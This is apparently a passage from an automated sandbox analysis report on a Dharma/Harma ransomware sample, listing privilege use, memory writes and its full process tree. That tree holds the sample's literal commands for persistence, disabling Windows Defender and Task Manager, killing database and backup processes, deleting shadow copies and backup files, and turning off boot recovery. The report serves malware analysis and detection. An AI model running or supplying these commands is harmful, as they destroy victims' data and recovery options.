SeSystemProfilePrivilege 1948 WMIC.exe Token: SeSystemtimePrivilege 1948 WMIC.exe Token: SeProfSingleProcessPrivilege 1948 WMIC.exe Token: SeIncBasePriorityPrivilege 1948 WMIC.exe Token: SeCreatePagefilePrivilege 1948 WMIC.exe Token: SeBackupPrivilege 1948 WMIC.exe Token: SeRestorePrivilege 1948 WMIC.exe Token: SeShutdownPrivilege 1948 WMIC.exe Token: SeDebugPrivilege 1948 WMIC.exe Token: SeSystemEnvironmentPrivilege 1948 WMIC.exe Token: SeRemoteShutdownPrivilege 1948 WMIC.exe Token: SeUndockPrivilege 1948 WMIC.exe Token: SeManageVolumePrivilege 1948 WMIC.exe Token: 33 1948 WMIC.exe Token: 34 1948 WMIC.exe Token: 35 1948 WMIC.exe Token: SeBackupPrivilege 520 vssvc.exe Token: SeRestorePrivilege 520 vssvc.exe Token: SeAuditPrivilege 520 vssvc.exe Token: SeDebugPrivilege 948 taskkill.exe Token: SeDebugPrivilege 524 taskkill.exe Token: SeDebugPrivilege 1348 taskkill.exe Token: SeSecurityPrivilege 1940 wevtutil.exe Token: SeBackupPrivilege 1940 wevtutil.exe Token: SeSecurityPrivilege 1100 wevtutil.exe Token: SeBackupPrivilege 1100 wevtutil.exe Token: SeSecurityPrivilege 1776 wevtutil.exe Token: SeBackupPrivilege 1776 wevtutil.exe Token: SeSecurityPrivilege 788 wevtutil.exe Token: SeBackupPrivilege 788 wevtutil.exe Token: SeSecurityPrivilege 2028 wevtutil.exe Token: SeBackupPrivilege 2028 wevtutil.exe Token: SeSecurityPrivilege 1312 wevtutil.exe Token: SeBackupPrivilege 1312 wevtutil.exe Token: SeSecurityPrivilege 756 wevtutil.exe Token: SeBackupPrivilege 756 wevtutil.exe Token: SeSecurityPrivilege 432 wevtutil.exe Token: SeBackupPrivilege 432 wevtutil.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
mshta.exepid process 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe 1648 mshta.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
VirusShare_5c36e305d926e55ef98d392176890cd2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2000 wrote to memory of 1984 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1984 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1984 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 1984 wrote to memory of 1988 1984 cmd.exe schtasks.exe PID 1984 wrote to memory of 1988 1984 cmd.exe schtasks.exe PID 1984 wrote to memory of 1988 1984 cmd.exe schtasks.exe PID 2000 wrote to memory of 1700 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1700 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1700 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1944 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1944 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1944 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 584 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 584 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 584 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 584 wrote to memory of 468 584 cmd.exe schtasks.exe PID 584 wrote to memory of 468 584 cmd.exe schtasks.exe PID 584 wrote to memory of 468 584 cmd.exe schtasks.exe PID 2000 wrote to memory of 588 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 588 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 588 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 588 wrote to memory of 1028 588 cmd.exe attrib.exe PID 588 wrote to memory of 1028 588 cmd.exe attrib.exe PID 588 wrote to memory of 1028 588 cmd.exe attrib.exe PID 2000 wrote to memory of 1280 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1280 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1280 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 1280 wrote to memory of 1448 1280 cmd.exe schtasks.exe PID 1280 wrote to memory of 1448 1280 cmd.exe schtasks.exe PID 1280 wrote to memory of 1448 1280 cmd.exe schtasks.exe PID 2000 wrote to memory of 520 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 520 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 520 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 520 wrote to memory of 672 520 cmd.exe schtasks.exe PID 520 wrote to memory of 672 520 cmd.exe schtasks.exe PID 520 wrote to memory of 672 520 cmd.exe schtasks.exe PID 2000 wrote to memory of 2020 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 2020 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 2020 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2020 wrote to memory of 1692 2020 cmd.exe attrib.exe PID 2020 wrote to memory of 1692 2020 cmd.exe attrib.exe PID 2020 wrote to memory of 1692 2020 cmd.exe attrib.exe PID 2000 wrote to memory of 592 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 592 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 592 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 592 wrote to memory of 868 592 cmd.exe attrib.exe PID 592 wrote to memory of 868 592 cmd.exe attrib.exe PID 592 wrote to memory of 868 592 cmd.exe attrib.exe PID 2000 wrote to memory of 980 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 980 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 980 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 980 wrote to memory of 2040 980 cmd.exe cmd.exe PID 980 wrote to memory of 2040 980 cmd.exe cmd.exe PID 980 wrote to memory of 2040 980 cmd.exe cmd.exe PID 2000 wrote to memory of 1388 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1388 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 2000 wrote to memory of 1388 2000 VirusShare_5c36e305d926e55ef98d392176890cd2.exe cmd.exe PID 1388 wrote to memory of 1116 1388 cmd.exe cmd.exe PID 1388 wrote to memory of 1116 1388 cmd.exe cmd.exe PID 1388 wrote to memory of 1116 1388 cmd.exe cmd.exe PID 1388 wrote to memory of 1780 1388 cmd.exe taskkill.exe PID 1388 wrote to memory of 1780 1388 cmd.exe taskkill.exe PID 1388 wrote to memory of 1780 1388 cmd.exe taskkill.exe PID 2040 wrote to memory of 1132 2040 cmd.exe icacls.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 1028 attrib.exe 1692 attrib.exe 868 attrib.exe 948 attrib.exe 880 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt" && exit2⤵
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\FILES ENCRYPTED.txt"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/3⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/4⤵
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵
-
C:\Windows\system32\net.exenet stop avpsus /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net.exenet stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop mfewc /y2⤵
-
C:\Windows\system32\net.exenet stop mfewc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net.exenet stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY start=disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLTELEMETRY$ECWDB2 start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SQLWriter start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled2⤵
-
C:\Windows\system32\sc.exesc config SstpSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mspub.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopqos.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F2⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win c:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win d:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win e:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win f:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win g:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win h:*.dsk2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del %02⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s HRMPUB2⤵
-
C:\Windows\system32\attrib.exeattrib +h +s HRMPUB3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\HRMPUB2⤵
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\HRMPUB3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
